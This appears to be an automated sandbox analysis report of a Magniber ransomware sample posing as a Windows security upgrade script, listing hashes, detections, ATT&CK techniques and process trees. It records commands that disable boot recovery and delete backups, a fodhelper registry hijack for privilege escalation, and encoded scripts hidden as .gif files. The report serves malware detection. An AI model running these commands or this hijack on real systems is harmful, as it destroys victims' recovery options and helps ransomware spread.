magniber | 6a68217b951f9655e4a7ed13fcfc4696ac5d231450fe7d2be8b6a1d71425752c

Analysis

max time kernel
149s
max time network
147s
platform
windows10-2004_x64
resource
win10v2004-20220812-en
resource tags

arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system
submitted
15-09-2022 06:03

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

SYSTEM.Security.Database.Upgrade.Win10.0.jse
Size

185KB
MD5

f6d2fc78661b55258fb704f66c9949e4
SHA1

7c4608440e4afcb032890edd4deef18a0ce3c8dd
SHA256

6a68217b951f9655e4a7ed13fcfc4696ac5d231450fe7d2be8b6a1d71425752c
SHA512

9f66641f19e8046b19f7bffa056ec3e677aae853102dded94c22665381d0d2b65334c16c74d7b64df319b1518931d6ad281ad86c1fbc67ee6ba1984f67506dce
SSDEEP

3072:dthtQYzUz8giIajyEPeR00t/+DYhRkEIKf+6yr3S1IuIDbHBX66vPYH/J25gfgbD:z73zUz8gCjyUeihSRkCy3H36HxgbD

Score

10^/10

magniber evasion ransomware

Malware Config

Signatures

Detect magniber ransomware 3 IoCs

Processes:

resource	yara_rule
behavioral2/memory/2540-134-0x0000019BB13D0000-0x0000019BB23D0000-memory.dmp	family_magniber
behavioral2/memory/2404-135-0x0000013D03770000-0x0000013D0377A000-memory.dmp	family_magniber
behavioral2/memory/2540-148-0x0000019BB13D0000-0x0000019BB23D0000-memory.dmp	family_magniber

Magniber Ransomware
Ransomware family widely seen in Asia being distributed by the Magnitude exploit kit.
ransomware magniber

Process spawned unexpected child process 12 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

Processes:

bcdedit.exebcdedit.exewbadmin.exewbadmin.exebcdedit.exebcdedit.exewbadmin.exewbadmin.exebcdedit.exebcdedit.exewbadmin.exewbadmin.exe

description	pid	pid_target	Process	procid_target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	948	1116	bcdedit.exe	23
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2016	1116	bcdedit.exe	23
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4228	1116	wbadmin.exe	23
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3372	1116	wbadmin.exe	23
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4204	1116	bcdedit.exe	23
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2768	1116	bcdedit.exe	23
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3012	1116	wbadmin.exe	23
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4912	1116	wbadmin.exe	23
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3576	1116	bcdedit.exe	23
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3312	1116	bcdedit.exe	23
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1236	1116	wbadmin.exe	23
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4716	1116	wbadmin.exe	23

Modifies boot configuration data using bcdedit 1 TTPs 6 IoCs

ransomware evasion

Inhibit System Recovery

T1490

Processes:

bcdedit.exebcdedit.exebcdedit.exebcdedit.exebcdedit.exebcdedit.exe

pid	Process
948	bcdedit.exe
2016	bcdedit.exe
4204	bcdedit.exe
2768	bcdedit.exe
3576	bcdedit.exe
3312	bcdedit.exe

Deletes System State backups 3 TTPs 3 IoCs

Uses wbadmin.exe to inhibit system recovery.

ransomware

Command-Line Interface

T1059

File Deletion

T1107

Inhibit System Recovery

T1490

Processes:

wbadmin.exewbadmin.exewbadmin.exe

pid	Process
3372	wbadmin.exe
3012	wbadmin.exe
1236	wbadmin.exe

Deletes backup catalog 3 TTPs 3 IoCs

Uses wbadmin.exe to inhibit system recovery.

ransomware

Command-Line Interface

T1059

File Deletion

T1107

Inhibit System Recovery

T1490

Processes:

wbadmin.exewbadmin.exewbadmin.exe

pid	Process
4228	wbadmin.exe
4912	wbadmin.exe
4716	wbadmin.exe

Modifies extensions of user files 5 IoCs

Ransomware generally changes the extension on encrypted files.

ransomware

Processes:

sihost.exe

description	ioc	Process
File renamed	C:\Users\Admin\Pictures\UsePublish.raw => C:\Users\Admin\Pictures\UsePublish.raw.kzyfukvrt	sihost.exe
File renamed	C:\Users\Admin\Pictures\EnterCopy.png => C:\Users\Admin\Pictures\EnterCopy.png.kzyfukvrt	sihost.exe
File renamed	C:\Users\Admin\Pictures\HideUpdate.tif => C:\Users\Admin\Pictures\HideUpdate.tif.kzyfukvrt	sihost.exe
File opened for modification	C:\Users\Admin\Pictures\TestUnblock.tiff	sihost.exe
File renamed	C:\Users\Admin\Pictures\TestUnblock.tiff => C:\Users\Admin\Pictures\TestUnblock.tiff.kzyfukvrt	sihost.exe

Drops file in Windows directory 3 IoCs

Processes:

wbadmin.exe

description	ioc	Process
File opened for modification	C:\Windows\Logs\WindowsBackup\WBEngine.2.etl	wbadmin.exe
File opened for modification	C:\Windows\Logs\WindowsBackup\WBEngine.1.etl	wbadmin.exe
File opened for modification	C:\Windows\Logs\WindowsBackup\WBEngine.3.etl	wbadmin.exe

Program crash 1 IoCs

Processes:

WerFault.exe

pid	pid_target	Process	procid_target
3792	3252	WerFault.exe	16

Checks SCSI registry key(s) 3 TTPs 4 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

vds.exe

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName	vds.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_DADY&PROD_DADY_DVD-ROM\4&215468A5&0&010000	vds.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\FriendlyName	vds.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_DADY&PROD_HARDDISK\4&215468A5&0&000000	vds.exe

Modifies registry class 42 IoCs

Processes:

taskhostw.exeExplorer.EXERuntimeBroker.exesvchost.exeRuntimeBroker.exesvchost.exesihost.exeRuntimeBroker.exe

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\ms-settings	taskhostw.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\ms-settings\CurVer\ = "AppX0enk2acdsmv8ydhntbtea6yjp27223q6"	Explorer.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\AppX0enk2acdsmv8ydhntbtea6yjp27223q6\Shell\open\command\ = "wscript.exe /B /E:VBScript.Encode ../../Users/Public/aqgxlo.gif"	taskhostw.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\AppX0enk2acdsmv8ydhntbtea6yjp27223q6\Shell\open\command\DelegateExecute	taskhostw.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\AppX0enk2acdsmv8ydhntbtea6yjp27223q6\Shell\open\command\DelegateExecute	RuntimeBroker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\AppX0enk2acdsmv8ydhntbtea6yjp27223q6\Shell\open\command\DelegateExecute	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\ms-settings	svchost.exe
Key created	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\ms-settings	RuntimeBroker.exe
Key created	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\ms-settings\CurVer	RuntimeBroker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\AppX0enk2acdsmv8ydhntbtea6yjp27223q6\Shell\open\command\ = "wscript.exe /B /E:VBScript.Encode ../../Users/Public/pdtepzmyfo.gif"	svchost.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\AppX0enk2acdsmv8ydhntbtea6yjp27223q6\Shell\open\command\ = "wscript.exe /B /E:VBScript.Encode ../../Users/Public/tdenucj.gif"	sihost.exe
Key created	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\	Explorer.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\AppX0enk2acdsmv8ydhntbtea6yjp27223q6\Shell\open\command\DelegateExecute	svchost.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\AppX0enk2acdsmv8ydhntbtea6yjp27223q6\Shell\open\command\ = "wscript.exe /B /E:VBScript.Encode ../../Users/Public/vgthue.gif"	svchost.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\AppX0enk2acdsmv8ydhntbtea6yjp27223q6\Shell\open\command\ = "wscript.exe /B /E:VBScript.Encode ../../Users/Public/xfiouaef.gif"	RuntimeBroker.exe
Key created	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\ms-settings\CurVer	svchost.exe
Key created	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\ms-settings\CurVer	taskhostw.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\ms-settings\CurVer\ = "AppX0enk2acdsmv8ydhntbtea6yjp27223q6"	sihost.exe
Key created	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\ms-settings\CurVer	Explorer.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\ms-settings\CurVer\ = "AppX0enk2acdsmv8ydhntbtea6yjp27223q6"	RuntimeBroker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\ms-settings\CurVer\ = "AppX0enk2acdsmv8ydhntbtea6yjp27223q6"	RuntimeBroker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\AppX0enk2acdsmv8ydhntbtea6yjp27223q6\Shell\open\command\ = "wscript.exe /B /E:VBScript.Encode ../../Users/Public/xjyektyh.gif"	RuntimeBroker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\ms-settings\CurVer\ = "AppX0enk2acdsmv8ydhntbtea6yjp27223q6"	RuntimeBroker.exe
Key created	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\ms-settings	svchost.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\ms-settings\CurVer\ = "AppX0enk2acdsmv8ydhntbtea6yjp27223q6"	svchost.exe
Key created	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\ms-settings	RuntimeBroker.exe
Key created	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\ms-settings\CurVer	RuntimeBroker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\ms-settings\CurVer\ = "AppX0enk2acdsmv8ydhntbtea6yjp27223q6"	taskhostw.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\AppX0enk2acdsmv8ydhntbtea6yjp27223q6\Shell\open\command\DelegateExecute	RuntimeBroker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\AppX0enk2acdsmv8ydhntbtea6yjp27223q6\Shell\open\command\DelegateExecute	RuntimeBroker.exe
Key created	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\ms-settings\CurVer	svchost.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\ms-settings\CurVer\ = "AppX0enk2acdsmv8ydhntbtea6yjp27223q6"	svchost.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\AppX0enk2acdsmv8ydhntbtea6yjp27223q6\Shell\open\command\DelegateExecute	svchost.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\AppX0enk2acdsmv8ydhntbtea6yjp27223q6\Shell\open\command\DelegateExecute	sihost.exe
Key created	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\ms-settings	sihost.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\AppX0enk2acdsmv8ydhntbtea6yjp27223q6\Shell\open\command\ = "wscript.exe /B /E:VBScript.Encode ../../Users/Public/viucsoq.gif"	Explorer.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\ms-settings\CurVer	RuntimeBroker.exe
Key created	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\ms-settings\CurVer	sihost.exe
Key created	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\ms-settings	Explorer.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\AppX0enk2acdsmv8ydhntbtea6yjp27223q6\Shell\open\command\ = "wscript.exe /B /E:VBScript.Encode ../../Users/Public/ujeqpgwgvgs.gif"	RuntimeBroker.exe
Key created	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\ms-settings	RuntimeBroker.exe

Suspicious behavior: EnumeratesProcesses 2 IoCs

Processes:

WScript.exe

pid	Process
2540	WScript.exe
2540	WScript.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

Processes:

Explorer.EXE

pid	Process
2740	Explorer.EXE

Suspicious use of AdjustPrivilegeToken 51 IoCs

Processes:

Explorer.EXEvssvc.exewbengine.exeRuntimeBroker.exe

description	pid	Process
Token: SeShutdownPrivilege	2740	Explorer.EXE
Token: SeCreatePagefilePrivilege	2740	Explorer.EXE
Token: SeShutdownPrivilege	2740	Explorer.EXE
Token: SeCreatePagefilePrivilege	2740	Explorer.EXE
Token: SeBackupPrivilege	744	vssvc.exe
Token: SeRestorePrivilege	744	vssvc.exe
Token: SeAuditPrivilege	744	vssvc.exe
Token: SeShutdownPrivilege	2740	Explorer.EXE
Token: SeCreatePagefilePrivilege	2740	Explorer.EXE
Token: SeShutdownPrivilege	2740	Explorer.EXE
Token: SeCreatePagefilePrivilege	2740	Explorer.EXE
Token: SeShutdownPrivilege	2740	Explorer.EXE
Token: SeCreatePagefilePrivilege	2740	Explorer.EXE
Token: SeShutdownPrivilege	2740	Explorer.EXE
Token: SeCreatePagefilePrivilege	2740	Explorer.EXE
Token: SeShutdownPrivilege	2740	Explorer.EXE
Token: SeCreatePagefilePrivilege	2740	Explorer.EXE
Token: SeBackupPrivilege	5036	wbengine.exe
Token: SeRestorePrivilege	5036	wbengine.exe
Token: SeSecurityPrivilege	5036	wbengine.exe
Token: SeShutdownPrivilege	2740	Explorer.EXE
Token: SeCreatePagefilePrivilege	2740	Explorer.EXE
Token: SeShutdownPrivilege	3420	RuntimeBroker.exe
Token: SeShutdownPrivilege	3420	RuntimeBroker.exe
Token: SeShutdownPrivilege	3420	RuntimeBroker.exe
Token: SeShutdownPrivilege	2740	Explorer.EXE
Token: SeCreatePagefilePrivilege	2740	Explorer.EXE
Token: SeShutdownPrivilege	2740	Explorer.EXE
Token: SeCreatePagefilePrivilege	2740	Explorer.EXE
Token: SeShutdownPrivilege	2740	Explorer.EXE
Token: SeCreatePagefilePrivilege	2740	Explorer.EXE
Token: SeShutdownPrivilege	2740	Explorer.EXE
Token: SeCreatePagefilePrivilege	2740	Explorer.EXE
Token: SeShutdownPrivilege	2740	Explorer.EXE
Token: SeCreatePagefilePrivilege	2740	Explorer.EXE
Token: SeShutdownPrivilege	2740	Explorer.EXE
Token: SeCreatePagefilePrivilege	2740	Explorer.EXE
Token: SeShutdownPrivilege	2740	Explorer.EXE
Token: SeCreatePagefilePrivilege	2740	Explorer.EXE
Token: SeShutdownPrivilege	2740	Explorer.EXE
Token: SeCreatePagefilePrivilege	2740	Explorer.EXE
Token: SeShutdownPrivilege	2740	Explorer.EXE
Token: SeCreatePagefilePrivilege	2740	Explorer.EXE
Token: SeShutdownPrivilege	2740	Explorer.EXE
Token: SeCreatePagefilePrivilege	2740	Explorer.EXE
Token: SeShutdownPrivilege	2740	Explorer.EXE
Token: SeCreatePagefilePrivilege	2740	Explorer.EXE
Token: SeShutdownPrivilege	2740	Explorer.EXE
Token: SeCreatePagefilePrivilege	2740	Explorer.EXE
Token: SeShutdownPrivilege	2740	Explorer.EXE
Token: SeCreatePagefilePrivilege	2740	Explorer.EXE

Suspicious use of WriteProcessMemory 23 IoCs

Processes:

WScript.execmd.exefodhelper.execmd.exefodhelper.execmd.exefodhelper.exe

description	pid	Process	procid_target
PID 2540 wrote to memory of 2404	2540	WScript.exe	47
PID 2540 wrote to memory of 2432	2540	WScript.exe	46
PID 2540 wrote to memory of 2588	2540	WScript.exe	43
PID 2540 wrote to memory of 2740	2540	WScript.exe	18
PID 2540 wrote to memory of 2648	2540	WScript.exe	17
PID 2540 wrote to memory of 3252	2540	WScript.exe	16
PID 2540 wrote to memory of 3344	2540	WScript.exe	15
PID 2540 wrote to memory of 3420	2540	WScript.exe	14
PID 2540 wrote to memory of 3504	2540	WScript.exe	41
PID 2540 wrote to memory of 3704	2540	WScript.exe	40
PID 2540 wrote to memory of 4608	2540	WScript.exe	37
PID 2756 wrote to memory of 4368	2756	cmd.exe	86
PID 2756 wrote to memory of 4368	2756	cmd.exe	86
PID 4368 wrote to memory of 4904	4368	fodhelper.exe	88
PID 4368 wrote to memory of 4904	4368	fodhelper.exe	88
PID 4524 wrote to memory of 3512	4524	cmd.exe	111
PID 4524 wrote to memory of 3512	4524	cmd.exe	111
PID 3512 wrote to memory of 628	3512	fodhelper.exe	113
PID 3512 wrote to memory of 628	3512	fodhelper.exe	113
PID 3628 wrote to memory of 3836	3628	cmd.exe	124
PID 3628 wrote to memory of 3836	3628	cmd.exe	124
PID 3836 wrote to memory of 3712	3836	fodhelper.exe	125
PID 3836 wrote to memory of 3712	3836	fodhelper.exe	125

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
PID:3420

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
1⤵
PID:3344

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
PID:3252
- C:\Windows\system32\WerFault.exe
  C:\Windows\system32\WerFault.exe -u -p 3252 -s 884
  2⤵
  - Program crash
  PID:3792

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
1⤵
- Modifies registry class
PID:2648

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
- Modifies registry class
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
PID:2740
- C:\Windows\System32\WScript.exe
  C:\Windows\System32\WScript.exe "C:\Users\Admin\AppData\Local\Temp\SYSTEM.Security.Database.Upgrade.Win10.0.jse"
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of WriteProcessMemory
  PID:2540
- C:\Windows\System32\cmd.exe
  /c fodhelper.exe
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3628
- - C:\Windows\System32\fodhelper.exe
    fodhelper.exe
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3836
  - - C:\Windows\system32\wscript.exe
      "wscript.exe" /B /E:VBScript.Encode ../../Users/Public/viucsoq.gif
      4⤵
      PID:3712

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
- Modifies registry class
PID:4608

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
- Modifies registry class
PID:3704
- C:\Windows\System32\cmd.exe
  /c fodhelper.exe
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2756
- - C:\Windows\System32\fodhelper.exe
    fodhelper.exe
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4368
  - - C:\Windows\system32\wscript.exe
      "wscript.exe" /B /E:VBScript.Encode ../../Users/Public/ujeqpgwgvgs.gif
      4⤵
      PID:4904

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
1⤵
PID:3504

C:\Windows\system32\taskhostw.exe
taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
1⤵
- Modifies registry class
PID:2588

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
1⤵
- Modifies registry class
PID:2432

C:\Windows\system32\sihost.exe
sihost.exe
1⤵
- Modifies extensions of user files
- Modifies registry class
PID:2404
- C:\Windows\System32\cmd.exe
  /c fodhelper.exe
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4524
- - C:\Windows\System32\fodhelper.exe
    fodhelper.exe
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3512
  - - C:\Windows\system32\wscript.exe
      "wscript.exe" /B /E:VBScript.Encode ../../Users/Public/viucsoq.gif
      4⤵
      PID:628

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 456 -p 3252 -ip 3252
1⤵
PID:4380

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:744

C:\Windows\system32\bcdedit.exe
bcdedit /set {default} bootstatuspolicy ignoreallfailures
1⤵
- Process spawned unexpected child process
- Modifies boot configuration data using bcdedit
PID:948

C:\Windows\system32\bcdedit.exe
bcdedit /set {default} recoveryenabled no
1⤵
- Process spawned unexpected child process
- Modifies boot configuration data using bcdedit
PID:2016

C:\Windows\system32\wbadmin.exe
wbadmin delete catalog -quiet
1⤵
- Process spawned unexpected child process
- Deletes backup catalog
PID:4228

C:\Windows\system32\wbadmin.exe
wbadmin delete systemstatebackup -quiet
1⤵
- Process spawned unexpected child process
- Deletes System State backups
PID:3372

C:\Windows\system32\wbengine.exe
"C:\Windows\system32\wbengine.exe"
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:5036

C:\Windows\System32\vdsldr.exe
C:\Windows\System32\vdsldr.exe -Embedding
1⤵
PID:4400

C:\Windows\System32\vds.exe
C:\Windows\System32\vds.exe
1⤵
- Checks SCSI registry key(s)
PID:448

C:\Windows\system32\bcdedit.exe
bcdedit /set {default} bootstatuspolicy ignoreallfailures
1⤵
- Process spawned unexpected child process
- Modifies boot configuration data using bcdedit
PID:4204

C:\Windows\system32\bcdedit.exe
bcdedit /set {default} recoveryenabled no
1⤵
- Process spawned unexpected child process
- Modifies boot configuration data using bcdedit
PID:2768

C:\Windows\system32\wbadmin.exe
wbadmin delete systemstatebackup -quiet
1⤵
- Process spawned unexpected child process
- Deletes System State backups
- Drops file in Windows directory
PID:3012

C:\Windows\system32\wbadmin.exe
wbadmin delete catalog -quiet
1⤵
- Process spawned unexpected child process
- Deletes backup catalog
PID:4912

C:\Windows\system32\bcdedit.exe
bcdedit /set {default} bootstatuspolicy ignoreallfailures
1⤵
- Process spawned unexpected child process
- Modifies boot configuration data using bcdedit
PID:3576

C:\Windows\system32\bcdedit.exe
bcdedit /set {default} recoveryenabled no
1⤵
- Process spawned unexpected child process
- Modifies boot configuration data using bcdedit
PID:3312

C:\Windows\system32\wbadmin.exe
wbadmin delete systemstatebackup -quiet
1⤵
- Process spawned unexpected child process
- Deletes System State backups
PID:1236

C:\Windows\system32\wbadmin.exe
wbadmin delete catalog -quiet
1⤵
- Process spawned unexpected child process
- Deletes backup catalog
PID:4716

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Command-Line Interface

T1059

Persistence

Privilege Escalation

Defense Evasion

File Deletion

T1107

Credential Access

Discovery

Peripheral Device Discovery

T1120

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Inhibit System Recovery

T1490

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Public\ujeqpgwgvgs.gif

Filesize
853B

MD5
e1364886ae80ad259f572645fb45e98b

SHA1
132dc959681181e7ab6dd6909046f53c5e9f69ad

SHA256
000ae2cfe01b7e4c5b1e01ad1a4c0aa0b223f373a1fecf13b8d052d55f9401a5

SHA512
632735d26425c0efa2f6a172625173d0e7bbc2d0b589cf0cfb2a3872a298edac6627596792daf4b3199248bd4fb83ada21a25f738a01b492ed95d19aea40890b

Download Submit
C:\Users\Public\viucsoq.gif

Filesize
853B

MD5
e1364886ae80ad259f572645fb45e98b

SHA1
132dc959681181e7ab6dd6909046f53c5e9f69ad

SHA256
000ae2cfe01b7e4c5b1e01ad1a4c0aa0b223f373a1fecf13b8d052d55f9401a5

SHA512
632735d26425c0efa2f6a172625173d0e7bbc2d0b589cf0cfb2a3872a298edac6627596792daf4b3199248bd4fb83ada21a25f738a01b492ed95d19aea40890b

Download Submit
memory/628-153-0x0000000000000000-mapping.dmp

Download
memory/2404-135-0x0000013D03770000-0x0000013D0377A000-memory.dmp

Filesize
40KB

Download
memory/2540-132-0x00007FFF39CB0000-0x00007FFF3A771000-memory.dmp

Filesize
10.8MB

Download
memory/2540-134-0x0000019BB13D0000-0x0000019BB23D0000-memory.dmp

Filesize
16.0MB

Download
memory/2540-145-0x00007FFF39CB0000-0x00007FFF3A771000-memory.dmp

Filesize
10.8MB

Download
memory/2540-147-0x00007FFF39CB0000-0x00007FFF3A771000-memory.dmp

Filesize
10.8MB

Download
memory/2540-148-0x0000019BB13D0000-0x0000019BB23D0000-memory.dmp

Filesize
16.0MB

Download
memory/3512-152-0x0000000000000000-mapping.dmp

Download
memory/3712-156-0x0000000000000000-mapping.dmp

Download
memory/3836-155-0x0000000000000000-mapping.dmp

Download
memory/4368-149-0x0000000000000000-mapping.dmp

Download
memory/4904-150-0x0000000000000000-mapping.dmp

Download